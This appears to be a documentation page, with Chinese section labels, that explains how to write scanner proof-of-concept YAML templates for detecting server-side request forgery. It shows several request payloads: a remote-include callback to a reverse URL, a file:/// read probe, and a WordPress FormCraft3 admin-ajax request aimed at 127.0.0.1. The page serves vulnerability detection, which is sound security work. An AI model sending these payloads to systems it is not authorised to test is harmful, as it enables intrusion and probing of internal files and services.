发出
确切的返回结果
报错信息
正确
name: poc-yaml-ssrf-reverse transport: http set: reverse: newReverse() reverseURL: reverse.url rules: r0: request: cache: true method: POST path: /xxx headers: Content-Type: application/json body: | {"content": "include:\n remote: {{reverseURL}}"} expression: response.status == 200 && reverse.wait(5)
r0: request: cache: true method: POST path: /xxx headers: Content-Type: application/x-www-form-urlencoded body: | url=file:///{{filename}} follow_redirects: false expression: | response.status == 500 && response.body.bcontains(b"\"exception\":\"java.io.FileNotFoundException\",")
r0: request: cache: true method: GET path: /xxx/http/example.com follow_redirects: true expression: response.status == 200 && response.body.bcontains(b"<title>Example Domain</title>") && response.body.bcontains(b"<h1>Example Domain</h1>")
公共站点
r0: request: cache: true method: GET path: /wp-admin/admin-ajax.php?action=formcraft3_get&URL=http://127.0.0.1:0 follow_redirects: false expression: | response.status == 200 && response.body.bcontains(b"cURL error 3: ") && response.body.bcontains(b"failed")
Was this page helpful?